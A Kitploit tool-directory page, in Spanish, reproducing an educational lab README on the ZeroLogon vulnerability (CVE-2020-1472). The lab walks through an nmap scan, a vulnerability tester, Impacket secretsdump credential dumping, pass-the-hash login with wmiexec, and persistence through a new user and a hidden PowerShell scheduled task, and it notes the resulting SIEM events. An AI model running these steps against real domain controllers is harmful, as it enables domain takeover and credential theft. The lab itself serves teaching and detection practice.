Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ZeroLogon-CVE-2020-1472-lab — Explicación y demostración de la vulnerabilidad ZeroLogon (CVE-2020-1472) | Kitploit
Herramientas/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
Escalada de PrivilegiosAtaques de ContraseñasMecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónCTFPruebas de PenetraciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Labs y Práctica
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

Explicación y demostración de la vulnerabilidad ZeroLogon (CVE-2020-1472)

Ver Repositorio
12hace 11 mesesAún no revisado

ZeroLogon-CVE-2020-1472

Explicación y demostración de la vulnerabilidad ZeroLogon (CVE-2020-1472)

El objetivo de este laboratorio es estrictamente educativo. Su ejecución no está recomendada en entornos de producción o que no le pertenezcan.

Sobre la Vulnerabilidad

Contexto de la vulnerabilidad

Esta vulnerabilidad permite que un ciberdelincuente asuma el control de un Controlador de Dominio (DC). Esto se logra alterando o eliminando la contraseña de una cuenta de servicio en el controlador. El agente malicioso puede simplemente causar una denegación de servicio o tomar el control y poseer toda la red. En agosto de 2020, Microsoft lanzó un parche.

  • Severidad: 10.0 (Crítica) (CVSS v3.1)

Componente afectado: Microsoft Netlogon Remote Protocol (MS-NRPC)

Versiones de Windows afectadas:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • Versiones anteriores al parche de agosto/septiembre de 2020

Requisitos

Clonar los repositorios

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - Prueba si el servidor objetivo está vulnerable

Si se va a ejecutar localmente!

  • Descarga de Kali Linux
  • Descarga de Windows Server 2008 R2 vulnerable
  • Virtualbox

En AWS también es posible con estas imágenes (cuidado con el billing)

  • Windows Vulnerable - AMI de la comunidad 921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - AMI del Marketplace

Extra: Una cuenta en Wazuh para análisis de los eventos del SIEM.

  • Wazuh Cloud con prueba de 14 días

Cómo explotar

Consejo: En Kali Linux, el servicio SSH viene desactivado por defecto — es necesario iniciarlo manualmente.

Antes de probar si el servidor está vulnerable, podemos utilizar nmap para ver qué puertos están abiertos:

nmap -sS -T4 -F --open -n ip
Captura de pantalla 2025-10-10 a las 09 34 13

Usando CVE-2020-1472 - Prueba si el servidor objetivo está vulnerable. Ejecute el comando:

zerologon_tester.py <dc-name> <dc-ip>
Captura de pantalla 2025-10-04 a las 20 14 40

La herramienta secretsdump es una toolkit de Impacket

python3 secretsdump.py -just-dc wayne/w2008\[email protected]
Captura de pantalla 2025-10-04 a las 20 23 53
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Captura de pantalla 2025-10-04 a las 20 27 05

Si todo sale bien, lograremos iniciar sesión con el hash What is a pass-the-hash attack?

Captura de pantalla 2025-10-04 a las 20 30 39

¡Ahora solo hay que crear una persistencia! ¡Puede ser un nuevo usuario!

net user coringa Batman2025 /add
Captura de pantalla 2025-10-04 a las 20 36 09

¡Hecho! ¡El usuario fue creado con éxito!

Captura de pantalla 2025-10-04 a las 20 38 04

También es posible crear una tarea!

mkdir C:\Temp
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Captura de pantalla 2025-10-10 a las 10 17 17 Captura de pantalla 2025-10-10 a las 10 20 33

Eventos en el SIEM

Es posible ver la creación de usuarios y los eventos relacionados con pass-the-hash y creación de usuarios!

2025-10-06_10-08-10 2025-10-06_10-09-06

Referencias

  • Zerologon (CVE-2020-1472): An Unauthenticated Privilege Escalation to Full Domain Privilege
  • ¿Qué es Zerologon?
  • [MS-NRPC]: Netlogon Remote Protocol
  • CVE-2020-1472 Detail
  • ZeroLogon-CVE-2020-1472 - Lab en Youtube
  • Pass-the-Hash Attack
  • Más sobre Impacket
Descargar herramienta